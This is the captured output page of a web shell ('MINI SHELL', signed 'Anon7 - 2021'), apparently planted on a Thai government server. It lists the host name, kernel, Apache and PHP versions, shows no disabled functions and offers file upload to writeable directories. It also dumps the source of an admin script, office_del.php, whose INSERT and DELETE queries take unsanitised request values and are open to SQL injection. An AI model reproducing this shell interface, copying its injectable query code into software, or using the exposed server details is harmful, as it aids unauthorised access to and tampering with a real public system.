MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_vc/report/pdir/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_vc/report/pdir/admin/office_del.php
<?
session_start() ; 

?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<SCRIPT language=JavaScript>
function   chk_confirmdel(name,id1) {
	if ((confirm( "การลบ \"" + name +  "\" ออกจากทำเนียบส่วนราชการ \r\nทำให้ \"" + name + "\" ไม่สามารถเข้าระบบเพื่อปรับปรุงข้อมูลได้  \r\n\r\nยืนยันการลบ  คลิ๊ก \"Ok\"  "))){					
		window.document.location = "office_del2.php?id="+id1  ;
	}else{
		window.close();
	}
	return false; 		
}	  
</SCRIPT>

<SCRIPT language=JavaScript>
function   alert_confirmdel(name,id1) {
	alert( "    การลบ \"" + name +  "\" ออกจากทำเนียบส่วนราชการ \r\nทำให้ \"" + name + "\" ไม่สามารถเข้าระบบเพื่อปรับปรุงข้อมูลได้  \r\n\r\n   ระบบไม่อนุญาติให้ลบ กรุณายกเลิกสิทธิการเข้าระบบ ")  ; 
	window.close();
	return false; 		
}	  
</SCRIPT>

<?
#echo " ==========> ก่อนเข้า conn db";
 include ("../../../inc/conndb.inc.php");
//$dbname = $db_dataentry ;
 #echo " ==========> หลังเข้า conn db";
 
 
 $idxx = $id ."_". $th_name ;  
$sql = "INSERT INTO `systemlog`    "; 
$sql = $sql. "(`userid`, `process_id`, `detial_id`, `time`, `status`, `logupload_id` ) VALUES     "; 
$sql = $sql. "('infoadm', 'pdi1', '$idxx', NOW(), '', 0 );    "; 
if (!($query_result = mysql_db_query($dbname,$sql))){
		echo mysql_error();    die;   echo "$sql <hr>";
}    

$sql0 = " SELECT   *   FROM  login   WHERE   office_refid  =  '$id'  ";
$query_result0 = mysql_db_query($dbname,$sql0)   ;
 if (mysql_num_rows($query_result0) >  0 ){
 	echo " <SCRIPT language=JavaScript> alert_confirmdel('$th_name','$id')  </SCRIPT> ";	
	die;
 }else{ 
 		$result0 = mysql_fetch_array($query_result0);
 		$login_id =  $result0[id]  ;
		
		$sql = "delete from office_detail   where id = '$id' ";	 
		if (!($query_result = mysql_db_query($dbname,$sql))){
				echo mysql_error();    die;   echo "$sql <hr>";
		} 				
?>				
<script  language="javascript">
//function updateManiPage(){
	opener.document.location.reload();	
    window.close();
//}
</script>				
<?				
 }  // End check  if (mysql_num_rows(   ==>  SELECT   *   FROM  login   WHERE   office_refid  =  '$id' 
?>
</head>
<body>

</body>
</html>

Anon7 - 2021